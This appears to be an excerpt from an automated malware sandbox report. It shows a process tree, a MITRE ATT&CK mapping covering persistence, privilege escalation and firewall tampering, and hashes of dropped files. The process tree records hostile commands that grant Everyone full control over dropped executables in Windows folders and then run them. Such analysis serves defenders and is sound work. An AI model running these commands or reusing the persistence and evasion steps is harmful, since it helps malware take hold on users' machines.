C:\Windows\system32\cacls.execacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F2⤵PID:2688
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F1⤵PID:2724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3528
-
-
C:\Windows\system32\cacls.execacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F2⤵PID:1168
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\puelpci.exe1⤵PID:5388
-
C:\Windows\ime\puelpci.exeC:\Windows\ime\puelpci.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5320
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F1⤵PID:5276
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5800
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F2⤵PID:5912
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
192KB
MD595332c0178e1c0cd879c859e56a2f98c
SHA19240531f08997965bf6d22c45bf8f228b2f3a758
SHA25680d77cf4b1afdd1a57af4b2c03a5fc845533572ead21498adbaf426b4f118f0c
SHA51227ccdef457d9ed72e9dac405f424824a2f9ac58dd67afd41e0ca5572e7b7fb6edba4d199e2f669aea2a73c60bde9d59001eda27a617d156b3bcfc0cc14b6c79a
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
26.8MB
MD58d22bcd73dbf176202fb005a2e057507
SHA1f2bd5ed08a7f54171bd1cafa4de76d3ff2d433e3
SHA2565961fd9fd6e6c0effd147da88a4f4483b838fd68cf4675c3c95180f9461de3ae
SHA512d9463c91fc75ca15463a07b695b62656cf0b15ce8d611d29e831e6353a29032210851e09b2dd569eca1fc7ec397f02f859b5e20c718d2c356461fe0bf129ba79
-
Filesize
25.6MB
MD517724e110afad9248e937cab40ce2aa0
SHA18a971f52f062f6cf02bb98258ff5eea97e1cc710
SHA256c21d435626445c33ad2260b5462339e511152b6bc107e0330bb0c80972c382ff
SHA5129f70c472a3bedeea8eaed23c82900374c2256ee2b4e9202e6a44577e0a9013e07856940a0fd01b30abd29c3bf0afa9f512a3d79307a77c0e8da4b01ce268e9ce
-
Filesize
960KB
MD5045fbba054dc6f72747f32ab2a01ccbb
SHA154068b665fd3bbb9e3b2d8deaacdf9b177ca6576
SHA256d9b668b3f5a8246637944f8b716cb2387ebdb578e3ec5c6647f8ba032d10d0f3
SHA5127c9418959e1cd6e3ec1041de0fed6d800fb6477217ab87b131dd169b34b9f9f6e495b3e43696fe8099e4502c800ee3e12fb46a0a39e0ae22a9d4c6de48592ef1
-
Filesize
4.3MB
MD5eb89c2b9c4de46d6bb0c2d4d6de3302a
SHA11cb0e0a8017d1699a3357bcfa197cc6a7aea3bc6
SHA256f2f10cffb42449047c41111bc40560acf6465dc1302faab2728bfb97ba001347
SHA512972f1b65881879c29f2ba0b53a8fb63878fb89a49e662ce9932775f2f72301bfdd4c2c8bb294cf5078d44ff2e5740a27a691b6b07f6ab654745b5f8c7b75adfe
-
Filesize
2.9MB
MD5679dbc844eaf942c42da4068bb2ea4e3
SHA1ede002b3ff8220fdd2645d06d9c335c8a99ea741
SHA2564b17552a6507917dfe166a3f1482d6e5515798b313ba3afda648b0729be53a3b
SHA512fce6db47c87b53d91be89417e32dbb1b9c6b174d8d999e249fa7ea984cecdfd68dbad43493521c07ba22ca337a77af6e8c12b25a54d35b6ee3980a9dacbec335
-
Filesize
7.6MB
MD559c331f1519531e76caa17bebe7b81fa
SHA12403dd3a8d77f4ac58c5740aa9dbc76a37efea52
SHA256fc4b1d85ac7127e9e422d3540e385cf1ed32e4bbafd36c5d0f2d612b0f193bfb
SHA51299b60d0001cd91474efae080896f5d875b5232af13813c7be3299aeefe5e1e61332e9bf337d89654bbec195e3acff112537f2961eb6c54279f53d43803aabc35
-
Filesize
814KB
MD59838349b743208a4b63ec2ac0af23822
SHA17d56c7a9dad92cfc41134a1a2e4972874fc402ab
SHA256fe0f08174d000fc891c39078e0219723b1d1cf1bfb01ca767230c8c40d47abf9
SHA512ad27d44966f294abcf5e2d42b131f443c1432fd98a2039cb3fed9c558d55e3c3195a951180817e4746e03a2d20f0ead9c63a4588bab04c473eb28abfff702c59
-
Filesize
2.0MB
MD5df5ed1c79f685ebb24d43a2de4305e71
SHA105483071510e2e8e446923fc082d56c74a08a574
SHA256be6c264955c8e23e6775463ab574f9c4b4a9e4d82a9767c48eaa4f71b90cb203
SHA512f4566271f907f2ef0ee984b2ac89d1b80c9c0537ff7d791091a069c4e8338a1debfba17fe6f3c942905c0c807835fa5cde76e5ca6be3deb63140379105cf87f1
-
Filesize
3.0MB
MD580dca466a923fad1b0b2399f976d8799
SHA19baf596074b3b322b371ad3d9ba59e7402cc1f2f
SHA2569172401ac471962059307de64ac7b604933fbf33052fea2d1cf957fe1c32c371
SHA512bb9f74a8ba08c59b06dba2ef24b9f70f60ff0e1c450abcf68c67b68a353d527357984ff9511c6a4d6cf92fa375e88599d758e3a084168f216bd2f71884af0b75
-
Filesize
20.3MB
MD558f718ecb02303efec69249036134aa8
SHA197ba03ca727e23a761665fc4db2c45921d0f26fe
SHA25606b8944a17ff31a8f19ed584ae0231c50b355839d52904d1220a1d20006eac86
SHA512f3ffde71324ee87f2a6fa2ed4b8746a55fcdc8b288bd689b978955682c5dab4cce1bd60d79c575aae1d11e782777d2bea59b9d02ea2573ee0f42707df66437d5
-
Filesize
6.0MB
MD508ffc97f55ecf2f96eb8c16f01f116fc
SHA131d58844fdaf5371fdfa4f39002f8888bf97e2ff
SHA2561a66bf9f5729c1d8822debda28bb6e8ded9a7d17c55347796c0534082400c3d4
SHA5126d1662807bd89264282496762b0d8aa8dacf6f9c7476d1d81fd329e38302815aaeff4d9c69e39efb891858c3e071a5fd1c268fe5e34269c82cdff2c29042eac1
-
Filesize
8.5MB
MD5b6962462363e777a5712885ffe6fd8a8
SHA1944c83d031a765f070a288537304c29603415651
SHA2562bbcb10e938adf9dd2f21cd6f929f20e41a9e1ca35abbb02bc4fb71c3314c3e1
SHA51247d072a46a9abed228816f43c3be90f34ec1fac0b986ce68a60463dabc04943adc3075505cf9983962e2c24ed1d1dbd6b348750ba69a2d1ee85fdd4291c3b69b
-
Filesize
1019KB
MD5f39554f8c39bffe3acb624ebc351831a
SHA1d1938b1d4b8b3974b1760d7a1fe96e1a7cbefd88
SHA256797a36eba53e7738d387b42bc5953dc219033ce3bb0b58f91a7210549e9a27d6
SHA512909d0fe8c95a232bb3ac22fb6aa7ef0e17164d27aa64c6b2f494cb484eb763e758d955e607634343c046e0c7c1cb7ba3cfa3f7f3c51501850ccbe9a0e9a48e33
-
Filesize
1.1MB
MD5c36c1e44579b481970b23ed82a4f4a70
SHA18e720606f7e54250a61e9e3b4ac7a8f838addb15
SHA25613668e8e34061b716751a9d90023e0bfb3dd76d55c26f83e4a7a623eaf2285da
SHA5127f2cad1d7546d71b6821a9143e565569e187c061d4abefe77bf80077030247475841f9b4916e7e197b98a37c115166a58724f9897ea3f254b7f398a1855c70b4
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
10.0MB
MD5d13342b1b44761ac8dbc6c0901cc7a0a
SHA10c62ce98f5e6f48a972cfc8dad10f2514e794155
SHA25646f614c649db7b5bf2112d70f16db200b8409486bc45172bccb73fb7f723e6d8
SHA512a6cd03d7df96fb6a466af7c2aedbe5332230aabc54c774f86516234ff4fa6868ab0c479e6c74319fc93daf21d9d46479e25e5c29e8732e05e2195b3e06c1200f
-
Filesize
5.7MB
MD52969ad2c084c9ae32c1ec4f6ade1a33f
SHA1a990b2f120502bc594276fa0e9a1f0a0f7993d74
SHA2561f80ebe1fc1726724137d349b917419744c5399eaa0ed3645c81a13ebfc79767
SHA5129ac4decacc384a05d82c36683ccbabbab4ef85a8aa36867e894a1ef4308c72cb34bb1c8921bff687f7bbcc0bb408fc3ce02c2496915f097b83737ebe3d59c59c
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376